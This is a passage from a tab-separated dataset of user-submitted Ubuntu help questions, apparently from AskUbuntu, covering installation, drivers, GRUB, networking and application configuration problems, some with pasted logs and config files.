processor function 5 flags : fast devsel 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 07 ) subsystem : pc partner limited / sapphire technology device 0123 flags : bus master , fast devsel , latency 0 , irq 46 i/o ports at e000 [ size=256 ] memory at d0004000 ( 64-bit , prefetchable ) [ size=4k ] memory at d0000000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 03:00.0 network controller : ralink corp. rt3290 wireless 802.11n 1t/1r pcie subsystem : azurewave device 2b87 flags : bus master , fast devsel , latency 0 , irq 47 memory at fea40000 ( 32-bit , non-prefetchable ) [ size=64k ] memory at fea30000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : rt2800pci 03:00.1 bluetooth : ralink corp. rt3290 bluetooth subsystem : azurewave device 2787 flags : bus master , fast devsel , latency 0 , irq 11 memory at fea20000 ( 32-bit , non-prefetchable ) [ size=64k ] memory at fea10000 ( 32-bit , non-prefetchable ) [ size=64k ] memory at fe900000 ( 32-bit , non-prefetchable ) [ size=1m ] expansion rom at fea00000 [ disabled ] [ size=64k ] capabilities : < access denied > thank you for all the help
375995	suggestions to purchase a system76 ubuntu pre-installed laptop	i am looking to buy a new laptop that well supports ubuntu , and recently came across the ubuntu laptop manufactured by system76 . i am not familiar with this brand although it seems to me they produce ubuntu laptop with good performance . the price listed on their website is also not that expensive as compared with a macbook pro , or thinkpad t series , or the dell xps developer edition thus i hope to ask your opinions before buying . has anyone used system76 ubuntu laptop ? how is the experience . is it worth to put the money on ? i plan to invest $ 1k for a new laptop . or even if it is not , would you recommend some other good brands ?
376000	upgrade failure	i have ubuntu 8.4 and my computer would not allow me to install updates so i tried for an entire upgrade instead ( to ubuntu 12.04 ) . everything went fine until it said `` installing new packages '' then it just sort of froze then shut down . i turned my computer back on but it didnt register my hard drive . i tried to manually mount it but it wont recognize my username/password so i cant go any further . when i simply try to skip mounting it says `` mountall failed pressing control+d will reboot '' . i 've honestly tried everything and i 'm lost .
376002	changing the name of an application in dash	i have two versions of a wine program . curently , they are named the same . i would like to change their name form `` program name '' to `` program name vesion.number '' . these programs have their .desktop files in ~.local/share/applications/wine/programs/ . when i edit them and change the name attribute in the desktop file , nothing happens . ( i remove and install leafpad all over to force some cache updating ) . when i rename the `` program name.desktop '' files to for example `` program nameaaa.desktop '' , the name in the dash changes . when i rename them back , it reverts to the original . i can live with `` program nameaaa.desktop '' but i still wonder why this happens ? i suspect some cache somewhere .
376003	wrong linux-headers-server version	on my ubuntu 12.04 server i get the message that linux-server depends on linux-headers-server 3.2.0.55.65 but 3.2.0.56.66 is installed . the suggested apt-get -f install wo n't work . my sources.list : # deb cdrom : [ ubuntu-server 12.04 lts _precise pangolin_ - release amd64 ( 20120424.1 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu-server 12.04 lts _precise pangolin_ - release amd64 ( 20120424.1 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu-server 12.04 lts _precise pangolin_ - release amd64 ( 20120424.1 ) ] / precise main restricted # deb cdrom : [ ubuntu-server 12.04 lts _precise pangolin_ - release amd64 ( 20120424.1 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu-server 12.04 lts _precise pangolin_ - release amd64 ( 20120424.1 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu-server 12.04 lts _precise pangolin_ - release amd64 ( 20120424.1 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //de.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //de.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //de.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //de.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //de.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //de.archive.ubuntu.com/ubuntu/ precise universe deb http : //de.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //de.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //de.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //de.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //de.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //de.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # uncomment the following two lines to add software from ubuntu's # # 'extras ' repository . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu precise main # deb-src http : //extras.ubuntu.com/ubuntu precise main
376006	update repositories for ubuntu 12.04lts	i got a server running ubuntu 12.04lts , and i got a bug in the apache-module mod_auth_cas . i noticed that because the 12.04 repositories lags far behind on apache-server updates and especially on mod_auth_cas , that installing new versions might remedy my situation . however , mod_auth_cas has a series of dependencies , and they might have more dependencies etc . in short , i 'd really like to use apt-get or synaptic . it has been suggested that to get access to the newest mod_auth_cas and apache httpd server , i can add to my /etc/apt/sources.list : deb http : //cz.archive.ubuntu.com/ubuntu saucy main universe however , will adding this , thus using the repositories of the newer ubuntu-versions , somehow destroy my server ? or is this considered safe ?
376007	battery failing on acer aspire one 722 when starting	i have been running ubuntu 13.04 on my acer about month ago , it has worked perfectly , but some days ago the battery hasnt allowed the computer to start . it starts normally with the computer connected and without the battery . a friend told me that it could be the battery that is failing . but it never happened before when using windows 8 . i am not saying that windows is better because in fact i love ubuntu ; but i do n't want to buy a new battery which could present the same problem . apologize my english , i am an ignorant on this and that 's the reasong why i 'm asking ; thanks so much
376008	switching between english and swedish keyboard on ubuntu 13.04	how can i switch between english and swedish keyboard on my ubuntu 13.04 ?
376010	other hard drive corrupt possibly , attempting to fix ?	a couple months back i tried putting ubuntu 12.04 on my computer and it worked for a while but i tried getting rid of it ( bad idea ) by uninstalling i believe something in the programs and features but now when i boot up with that hard drive their is just a grube rescue box and it 's like a big command prompt . anyways yesterday i tried reinstalling it , i selected my other drive and now when i boot up it boots me in ubuntu on my c drive . for some reason their is a program called ubuntu in my programs and features now , the weird part is their is no partition for ubuntu , is it okay to uninstall unbuntu from programs and features ? please help .
376012	ffmpeg how to output images from a video	i want to extract images from a video i want thous images to be extracted from specific time for example 0:30 1:15 1:45 and i would love them to be in png format as well thank you in advanced update thank you rechengehirn and rmano sadly i can not except both of your answer and i selected it randomly sorry for that but i thought it would be fair like that because both of your answers work so thank you again
376013	wrong resolution after login with xubuntu 13.10	after updating to xubuntu 13.10 , i can not log in with my normal user anymore . when logging in , a short while after typing the password , the screen refreshes and suddenly is all garbled , just like on old monitors if you set a wrong resolution or refresh rate . logging in as a new user works fine . no resolution problems . it 's like a wrong resolution is stored by the old user , but i can not figure out in which files this resolution is stored , and - obviously - i ca n't check in the settings manager either , as i ca n't get to it . any ideas ? thanks !
376015	different keyboard mapping after installing nvidia-prime	after installing nvidia-319 , nvidia-settings-319 and nvidia-prime , my keyboard mapping is different . when i press the hyphen key , it enters a forward slash . and that 's just one example . and it also changed my gtk theme to the old windows 98 thing . i do n't have a particular problem with the theming , but the keyboard mapping annoys me greatly . is there a fix for this , or am i just completely out ?
376019	update to ubuntu 13.1 has caused blurry fonts in wine app	i just updated to 13.1 and have noticed the application i run in wine now has very blurry fonts in some places . this did not happen until i upgraded to 13.1 .
376021	ubuntu server 13.10 does n't run on intel core- i7	i installed ubuntu 13.10 server 64 bit correctly in a pc . details of the machine ; processor : intel core i7-4770 motherborad : gigabyte b85m-hd3 ram : 8gb hard disk : 1tb but when the computer starts ubuntu does n't run ; you can see the image : ubuntu does n't start ;
376023	`` advanced partitioning tool '' not showing in gnome ubuntu installation	i am trying to install gnome ubuntu 13.10 on my lenovo thinkpad . after creating a bootable usb drive and booting from it i want to organize my partitions . so i went for `` do something else '' or whatever ... the thing that should lead me to some kind of partition-management-tool . the sad thing is , that nothing will happen . the installation-menu dissappears , i get to see a nice gnome-wallpaper but that 's it . no new window showing up for me . any ideas what i could be doing wrong ? gz
376030	unable to copy to a dir	any time i try to copy stuff over to the this folder it fails . mslawson @ matts-notebook : /tmp $ sudo cp -r rails_tutorial_sublime_text/* \~/.config/sublime-text-2/packages/user/ cp : target `~/.config/sublime-text-2/packages/user/ ' is not a directory can anyone help ?
376035	ca n't change password in ubuntu 13.10	i ca n't change root password in ubuntu 13.10 . i downloaded and installed it , but it created a new 5 char admin pw that i do not know . i went through the procedure at http : //www.psychocats.net/ubuntu/resetpassword i got to root , and it all seemed to work , but when i entered the new password it responded with passwd : authentication token manipulation error passwd : password unchanged
376037	ubuntu 12.04 lts 32 bit did n't recognize intel hd graphics	i have an error with recognize my intel hd graphics . i googled my problem , and found , that there are a bug for a long time . this is bug 914631 . almost all folks solve this problem , just typed two commands in terminal , which install mesa-utils . it seems works for everyone , except me . so , i typed in terminal : sudo apt-get install mesa-utils it was installed . but after rebooting nothing has changed . there are still recognized only i915 video driver ( intel gma ) vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) and description : vga compatible controller product : core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 18 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:42 memory : fb400000-fb7fffff memory : e0000000-efffffff ioport : ff00 ( size=8 ) i have intel core i3-550 proccessor . what i should to do to make it work properly ?
376039	mkfs.ext4 parameters	i have a question about the ext4 filesystem and in specific about the tool mkfs.ext4 . mkfs.ext4 -j -o extent < device > what does -j really do ? in the manual it says that it creates an ext3 - journal . why would i want that on an ext4 partition ? do i need this parameter at all to create a journal ? what about -o extent ? from looking at the manual it seems like this is a good idea , but are there any drawbacks ? so i guess what i am really asking is : what are recommended properties for a data partition ( in detail : a logical raid 1 partition , which under the hood uses 2 hdd-partitions ) ?
376042	unable to create new folders on ubuntu	i fresh installed ubuntu with lighttpd & i wan na add a test file to check if my server works or not . but i am unable to do so ... . i am unable to create files ... when i right clicked & opened permissions i do n't have any options which can be changed . all are unchangeable ... . it says root is the owner to the files ... please help me out . i am a noob at linux & now wan na learn it deeply ...
376043	splitting a file in two at the first occurrence of an specified string	how can i split a text file in two parts at the first occurrence of a specified string ? i looked at the split command , but it does n't do that . in the past i have used a script to do this . but it is not very efficient , and i have to move the script to different systems . i was wondering if there was a better way to achieve this .
376046	graphical driver 13.10 ati rv630	i started updating the distro from 13.04 to 13.10 . then i got my hands on a radeon hd 2600 . i installed the rv630 compatible catalystdriver from the official webpage . then xserver crashed everytime i opened a browser or vlc fx . i took notice that there was no driver listed in configuration underneath . michael @ statubtunu : ~ $ lshw -c video warning : you should run this program as super-user . *-display unclaimed description : vga compatible controller product : rv630 pro [ radeon hd 2600 pro ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list configuration : latency=0 resources : memory : d0000000-dfffffff memory : e0500000-e050ffff ioport:1000 ( size=256 ) memory : e0000000-e001ffff i installed additional drivers from jockey and the ubuntu softwarecenter ati-driver . though that only made it to crash xserver completely and when i type : michael @ statubtunu : ~ $ sudo startx x.org x server 1.14.3 release date : 2013-09-12 x protocol version 11 , revision 0 build operating system : linux 3.2.0-37-generic i686 ubuntu current operating system : linux statubtunu 3.11.0-13-generic # 20-ubuntu smp wed oct 23 17:26:33 utc 2013 i686 kernel command line : boot_image=/boot/vmlinuz-3.11.0-13-generic root=uuid=8fb2e395-0ea2-4f45-ac66-225696b7ce2c ro quiet splash vt.handoff=7 build date : 15 october 2013 09:23:29am xorg-server 2:1.14.3-3ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.30.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : tue nov 12 18:50:02 2013 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' initializing built-in extension generic event extension initializing built-in extension shape initializing built-in extension mit-shm initializing built-in extension xinputextension initializing built-in extension xtest initializing built-in extension big-requests initializing built-in extension sync initializing built-in extension xkeyboard initializing built-in extension xc-misc initializing built-in extension security initializing built-in extension xinerama initializing built-in extension xfixes initializing built-in extension render initializing built-in extension randr initializing built-in extension composite initializing built-in extension damage initializing built-in extension mit-screen-saver initializing built-in extension double-buffer initializing built-in extension record initializing built-in extension dpms initializing built-in extension x-resource initializing built-in extension xvideo initializing built-in extension xvideo-motioncompensation initializing built-in extension selinux initializing built-in extension xfree86-vidmodeextension initializing built-in extension xfree86-dga initializing built-in extension xfree86-dri initializing built-in extension dri2 loading extension glx error : could not insert 'fglrx ' : no such device ( ii ) [ kms ] drm report modesetting is n't supported . ( ee ) ( ee ) backtrace : ( ee ) 0 : /usr/bin/x ( xorg_backtrace+0x49 ) [ 0xb77780b9 ] ( ee ) 1 : /usr/bin/x ( 0xb75d8000+0x1a3e24 ) [ 0xb777be24 ] ( ee ) 2 : ( vdso ) ( __kernel_rt_sigreturn+0x0 ) [ 0xb75b540c ] ( ee ) 3 : /usr/bin/x ( xf86findoption+0x2a ) [ 0xb7681daa ] ( ee ) 4 : /usr/bin/x ( xf86findoptionvalue+0x23 ) [ 0xb7681f43 ] ( ee ) 5 : /usr/bin/x ( 0xb75d8000+0x7ebfd ) [ 0xb7656bfd ] ( ee ) 6 : /usr/bin/x ( xf86processoptions+0x37 ) [ 0xb7657507 ] ( ee ) 7 : /usr/lib/xorg/modules/libvbe.so ( vbedoedid+0xe7 ) [ 0xb5eb8647 ] ( ee ) 8 : /usr/lib/xorg/modules/drivers/vesa_drv.so ( 0xb5ee7000+0x287c ) [ 0xb5ee987c ] ( ee ) 9 : /usr/bin/x ( initoutput+0xb23 ) [ 0xb7659c33 ] ( ee ) 10 : /usr/bin/x ( 0xb75d8000+0x2a30b ) [ 0xb760230b ] ( ee ) 11 : /lib/i386-linux-gnu/libc.so.6 ( __libc_start_main+0xf5 ) [ 0xb71ba905 ] ( ee ) 12 : /usr/bin/x ( 0xb75d8000+0x2a908 ) [ 0xb7602908 ] ( ee ) ( ee ) segmentation fault at address 0x5 ( ee ) fatal server error : ( ee ) caught signal 11 ( segmentation fault ) . server aborting ( ee ) ( ee ) please consult the the x.org foundation support at for help . ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . ( ee ) ( ee ) server terminated with error ( 1 ) . closing log file . this is what comes , but no gui . is there any way to deal with this ?
376048	can not scan from gscan2pdf on 13.10 or ocr with tesseract	i am having a little bit of trouble with one of my favourite pieces of open source software . i had installed gscan2pdf ( 1.0.4 ) from the software centre on my 13.10 64bit machine ( clean install from 13.04 & back ups from deja dup ) . however , gscan2pdf will not scan , i have to scan using simple scan then open the pdf to ocr it with gscan2pdf . that is not ideal but not a deal breaker , the main issue for me is that when i select to ocr , tesseract is not an option . i have made sure tesseract-english is installed , but only gocr & cuneiform are the only options . please can anyone help me to get gscan2pdf to working like it should ? thank you for your time and answers .
376051	how to change local sync address with ubuntuone in windows 8 ?	i installed ubuntuone for users of windows 8 . they have error messages because of long filenames . is it possible to change the directory used for local sync , to make it shorter ? where do i need to go in windows 8 ? thanks
376052	ubuntu sometimes freezes when switching instances via unity’s launcher	i installed ubuntu 12.04 for a friend of mine and she often complains about freezes . i never saw these freezes myself , so i can only give the description she gave me : it happens when switching between multiple instances of an application via unity’s launcher after the click at the launcher , she sees a preview of all running instances ; when selecting one , it zooms in , and then ubuntu freezes it happens for evince and libreoffice ( but it’s rare that she opens several instances of any other programs ) if it freezes , she is still able to switch to the virtual terminal ( ctrl+alt+f1 ) but : it can’t be reproduced ; some days it doesn’t happen , some days it happens 3 times per hour for a long time it happened with libreoffice only , so i searched for possible solutions and disabled anti-aliasing ; after this it never crashed again when switching libreoffice instances , but it’s not a long time ago and so it might just be luck . any idea what could cause this resp . how to fix it ? anything i could do to investigate it ? the problem , as i said , is that it never happened when i was around ; and we never managed to reproduce it .
376053	installing 13.10	i hate to be a pest but i really would like to install ubuntu 13.10 on my computer but i 'm having no luck . i have made a live dvd . i can use it to try ubuntu before installing it and everything works fine . i installed it and it was suppose to have been installed along side my windows 8 but instead it erased everything . no biggie as i had everything backed up anyway and was planning on uninstalling windows 8 anyway if ubuntu worked out okay . in addition , it installed ubuntu 13.10 twice , at least two come up on the boot menu but neither of them will boot the computer . i keep getting different boot errors . but the disk works fine just trying it . is there anyway to just install straight from the internet ? i would like to get this thing working as it 's the only os i currently have at the moment and i do n't really have it . i apologize for asking so many questions but i would appreciate any and all help and thanks a bunch .
376054	grub error while installing ubuntu along windows 8	i am trying to install ubuntu 12.04 lts 64bit along my windows 8 . burned iso to usb , and when i run installation , i select `` something else '' under `` installation type '' . there i can choose how to divide partitions . i choose those and adjust them according to other guides : / /home /boot swap area now after i do that , it starts ubuntu installation and after few minutes comes error : the 'grub-efi-amd64-signed ' package failed to install into /target/ . i read some advices to disable quickboot/fastboot , intel smart response technology , fast startup , but my new asus laptop has none of those options in the bios . any idea how to install ubuntu ? i am strugling few days already . i think it has something to do with efi . thank you .
376056	nvidia geforce 6100 missing memory	i 'm not hardware guru so i 'm really lost here . i have nvidia geforce 6100 graphics card , which have 512 mb of ram , but when i open nvidia settings i see : total memory : 512 mb total dedicated memory : 128 mb so i can only use those 128 mb . why is that so , can i increase dedicated memory
376063	is it possible to make ubuntu look like the login screen ?	i 'm particularily fond of the way the login screen looks ( with the glassy appearance on the login window & the top bar ) - and was wondering if it 's possible to change the appearance to match it ?
376068	how can i get netflix-desktop to remember window settings ( or at least not start in full screen )	this is a fairly petty thing . i have installed netflix-desktop and it runs well . i would just like it to remember the window settings from my last session or , failing that , not start in full screen . i am aware that i can just hit f11 and drop out of fullscreen . like i said , i know this is petty . here is what the netflix-desktop startup script looks like : # ! /bin/sh # enable translation capabilities . gettext.sh export textdomain= '' netflix-desktop '' ; export textdomaindir= '' /usr/share/locale '' ; # general strings that are translatable gettext_service_name=`gettext `` netflix desktop '' ` ; wine_browser= '' /usr/bin/wine-browser '' ; package= '' netflix-desktop '' dependencies= '' wine-silverlight5.1-installer '' service= '' $ { gettext_service_name } '' url= '' http : //www.netflix.com/ '' `` $ { wine_browser } '' $ * ; it seems like there should be some parameter that i can pass to wine-browser , but i do n't know what it is . here is a copy of the relevant .wine-browser/profile-settings # wine browser profile settings ( do not edit ) extension_installed=1 ; client_side_graphics_workaround=0 ; browser_user_agent_workaround=1 ; browser_katsomo_workaround=1 ; browser_security_workaround=1 ; finally , here is the prefs.js which may be where the setting is although there is nothing really obvious to me : # mozilla user preferences user_pref ( `` app.update.enabled '' , false ) ; user_pref ( `` app.update.lastupdatetime.addon-background-update-timer '' , 1384276497 ) ; user_pref ( `` app.update.lastupdatetime.background-update-timer '' , 1384276377 ) ; user_pref ( `` app.update.lastupdatetime.blocklist-background-update-timer '' , 1384276617 ) ; user_pref ( `` app.update.lastupdatetime.browser-cleanup-thumbnails '' , 1366324221 ) ; user_pref ( `` app.update.lastupdatetime.search-engine-update-timer '' , 1351628024 ) ; user_pref ( `` browser.bookmarks.restore_default_bookmarks '' , false ) ; user_pref ( `` browser.cache.disk.capacity '' , 358400 ) ; user_pref ( `` browser.cache.disk.smart_size.first_run '' , false ) ; user_pref ( `` browser.cache.disk.smart_size.use_old_max '' , false ) ; user_pref ( `` browser.cache.disk.smart_size_cached_value '' , 358400 ) ; user_pref ( `` browser.download.panel.firstsessioncompleted '' , true ) ; user_pref ( `` browser.migration.version '' , 10 ) ; user_pref ( `` browser.pagethumbnails.storage_version '' , 3 ) ; user_pref ( `` browser.places.smartbookmarksversion '' , 4 ) ; user_pref ( `` browser.rights.3.shown '' , true ) ; user_pref ( `` browser.shell.checkdefaultbrowser '' , false ) ; user_pref ( `` browser.slowstartup.averagetime '' , 0 ) ; user_pref ( `` browser.slowstartup.samples '' , 0 ) ; user_pref ( `` browser.startup.homepage '' , `` http : //www.netflix.com/ '' ) ; user_pref ( `` browser.startup.homepage_override.buildid '' , `` 20120713134347 '' ) ; user_pref ( `` browser.startup.homepage_override.mstone '' , `` 14.0.1 '' ) ; user_pref ( `` browser.tabs.autohide '' , true ) ; user_pref ( `` datareporting.healthreport.nextdatasubmissiontime '' , `` 1384336720649 '' ) ; user_pref ( `` datareporting.healthreport.service.firstrun '' , true ) ; user_pref ( `` datareporting.policy.firstruntime '' , `` 1384250320649 '' ) ; user_pref ( `` datareporting.sessions.current.activeticks '' , 10 ) ; user_pref ( `` datareporting.sessions.current.clean '' , true ) ; user_pref ( `` datareporting.sessions.current.firstpaint '' , 1299 ) ; user_pref ( `` datareporting.sessions.current.main '' , 169 ) ; user_pref ( `` datareporting.sessions.current.sessionrestored '' , 1342 ) ; user_pref ( `` datareporting.sessions.current.starttime '' , `` 1384276822856 '' ) ; user_pref ( `` datareporting.sessions.current.totaltime '' , 70 ) ; user_pref ( `` datareporting.sessions.currentindex '' , 5 ) ; user_pref ( `` datareporting.sessions.previous.0 '' , `` { \ '' s\ '' :1384250318545 , \ '' a\ '' :11 , \ '' t\ '' :58 , \ '' c\ '' : true , \ '' m\ '' :219 , \ '' fp\ '' :787 , \ '' sr\ '' :3324 } '' ) ; user_pref ( `` datareporting.sessions.previous.1 '' , `` { \ '' s\ '' :1384250448283 , \ '' a\ '' :5 , \ '' t\ '' :47 , \ '' c\ '' : true , \ '' m\ '' :221 , \ '' fp\ '' :1135 , \ '' sr\ '' :1176 } '' ) ; user_pref ( `` datareporting.sessions.previous.2 '' , `` { \ '' s\ '' :1384276184319 , \ '' a\ '' :11 , \ '' t\ '' :69 , \ '' c\ '' : true , \ '' m\ '' :331 , \ '' fp\ '' :1541 , \ '' sr\ '' :1588 } '' ) ; user_pref ( `` datareporting.sessions.previous.3 '' , `` { \ '' s\ '' :1384276256520 , \ '' a\ '' :92 , \ '' t\ '' :461 , \ '' c\ '' : true , \ '' m\ '' :256 , \ '' fp\ '' :1398 , \ '' sr\ '' :1441 } '' ) ; user_pref ( `` datareporting.sessions.previous.4 '' , `` { \ '' s\ '' :1384276759544 , \ '' a\ '' :3 , \ '' t\ '' :12 , \ '' c\ '' : true , \ '' m\ '' :262 , \ '' fp\ '' :1412 , \ '' sr\ '' :1453 } '' ) ; user_pref ( `` distribution.mozilla13.bookmarksprocessed '' , true ) ; user_pref ( `` dom.ipc.plugins.processlaunchtimeoutsecs '' , 1 ) ; user_pref ( `` dom.ipc.plugins.timeoutsecs '' , 2 ) ; user_pref ( `` extensions.blocklist.enabled '' , false ) ; user_pref ( `` extensions.blocklist.pingcountversion '' , -1 ) ; user_pref ( `` extensions.bootstrappedaddons '' , `` { } '' ) ; user_pref ( `` extensions.databaseschema '' , 14 ) ; user_pref ( `` extensions.enabledaddons '' , `` % 7b66e634b8-39da-11e2-bccc-0090f5c75ad5 % 7d:0.3.0 , % 7b972ce4c6-7e08-4474-a285-3208198ce6fd % 7d:22.0 '' ) ; user_pref ( `` extensions.installcache '' , `` [ { \ '' name\ '' : \ '' app-global\ '' , \ '' addons\ '' : { \ '' { 972ce4c6-7e08-4474-a285-3208198ce6fd } \ '' : { \ '' descriptor\ '' : \ '' c : \\\\program files\\\\mozilla firefox\\\\browser\\\\extensions\\\\ { 972ce4c6-7e08-4474-a285-3208198ce6fd } \ '' , \ '' mtime\ '' :1384250292747 , \ '' rdftime\ '' :1371557659000 } } } , { \ '' name\ '' : \ '' app-profile\ '' , \ '' addons\ '' : { \ '' { 66e634b8-39da-11e2-bccc-0090f5c75ad5 } \ '' : { \ '' descriptor\ '' : \ '' z : \\\\usr\\\\share\\\\wine-browser-installer\\\\fullscreen-close-plugin\ '' , \ '' mtime\ '' :1384250116775 , \ '' rdftime\ '' :1381803141000 } } } ] '' ) ; user_pref ( `` extensions.lastappversion '' , `` 22.0 '' ) ; user_pref ( `` extensions.lastplatformversion '' , `` 22.0 '' ) ; user_pref ( `` extensions.pendingoperations '' , false ) ; user_pref ( `` extensions.shownselectionui '' , true ) ; user_pref ( `` gecko.buildid '' , `` 20130618035212 '' ) ; user_pref ( `` gecko.mstone '' , `` 22.0 '' ) ; user_pref ( `` general.useragent.override '' , `` mozilla/5.0 ( windows nt 5.1 ; rv:18.0 ) gecko/20100101 firefox/18.0 '' ) ; user_pref ( `` intl.charsetmenu.browser.cache '' , `` utf-8 '' ) ; user_pref ( `` network.cookie.prefsmigrated '' , true ) ; user_pref ( `` pdfjs.migrationversion '' , 1 ) ; user_pref ( `` pdfjs.previoushandler.alwaysaskbeforehandling '' , true ) ; user_pref ( `` places.history.expiration.transient_current_max_pages '' , 104858 ) ; user_pref ( `` plugin.disable_full_page_plugin_for_types '' , `` application/pdf '' ) ; user_pref ( `` plugin.importedstate '' , true ) ; user_pref ( `` privacy.sanitize.migratefx3prefs '' , true ) ; user_pref ( `` signon.remembersignons '' , false ) ; user_pref ( `` toolkit.startup.last_success '' , 1384276823 ) ; user_pref ( `` toolkit.telemetry.previousbuildid '' , `` 20130618035212 '' ) ; user_pref ( `` toolkit.telemetry.prompted '' , 2 ) ; user_pref ( `` toolkit.telemetry.rejected '' , true ) ; user_pref ( `` urlclassifier.keyupdatetime.https : //sb-ssl.google.com/safebrowsing/newkey '' , 1386842323 ) ; user_pref ( `` xpinstall.whitelist.add '' , `` '' ) ; user_pref ( `` xpinstall.whitelist.add.180 '' , `` '' ) ; user_pref ( `` xpinstall.whitelist.add.36 '' , `` '' ) ; i 've tried googling for common sense keywords , but have n't found anything helpful . any help will be appreciated .
376072	how could i install ubuntu in uefi mode ?	when i try to boot the usb flash drive the text that appears is garbled.it works in legacy mode but not in uefi . how could i install ubuntu in uefi mode ? this is how the bootscreen looks .
376073	linksys wireless n notebook adaptor	can i use the adaptor on ubuntu 12.o4.3 ? i intalled the card but it is not recogonized .
376075	grub menu still shows after ubuntu uninstallation	i 'm not sure this is technically the grub menu as i do n't really have much knowledge with ubuntu . but , when i boot my computer i 'm given the option to boot into windows 8.1 or ubuntu . i 've tried : bootrec.exe /fixmbr but i still receive the option to boot ubuntu . i also went to msconfig to delete ubuntu from the boot tab but it was n't there so i do n't really know how to proceed . any help is much appreciated .
376076	hide multiple files at once with shell script	i 'm trying to hide some files with some command , i tried the rm command , but it did not work and also tried to rename but did not understand how it works . the files that i want to hide have spaces in their names and i just want to put the dot in front of the names to let them hidden . can anyone help me ?
376081	how to write arabic numerical on libreoffice ?	i am using libreoffice and i write only english numerical and now i want to write arabic numerical instead of english numerical but i ca n't to change it please any one can help me what is the step to be able to write arabic numerical
376083	how do i install open office on a linux eeepc ?	i have tried to install open office 4.0.1 onto my eee pc , which is running linux i have tried the unpack way but apparently i do not have permission . how do i get this permission ? i have also tried the commands that i found online yet when i run the code it states there is no such file or directory , yet the file i wish to install is in teh directory i am running the file from . i am new to linux so i apologies if i have not got the terminology correct . please help
376084	what is the correct fstab entry for automounting a remote filesystem ?	i 'm running kubuntu 13.10 and i 'm trying to arrange for a remote filesystem to be automounted on startup . i have the following entry for it in fstab : hpmediavault : /shares/volume1/fileshare /mnt/mediavault nfs auto , noatime , nolock , bg , nfsvers=3 , intr , tcp , actimeo=1800 0 0 i can mount it perfectly well with sudo mount /mnt/mediavault but what does it take so that it will be mounted on startup with no explicit action on my part ?
376087	install juju on the main network interface	when i install juju , system creates my strange network interface and runs services on it , but i need to install juju on eth0 interface . how can i do that ?
376088	dhcp server handing out ip 's not in range	dhcp seems to giving out ip 's that are not in range for voip phones . when i release the ip address on a winxp machine it comes back with an ip in the range of 101-252 . the voip are another story . the voip phones are configured for dhcp . i have double-checked the dhcpd.conf file but everything seems fine . any assistance would be greatly appreciated . ddns-update-style none ; default-lease-time 600 ; max-lease-time 7200 ; authoritative ; log-facility local7 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.1.255 ; option routers 192.168.1.1 ; option domain-name-servers 192.168.1.1 ; option domain-name `` ubuntu-dchp.internal '' ; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.101 192.168.1.252 ; }
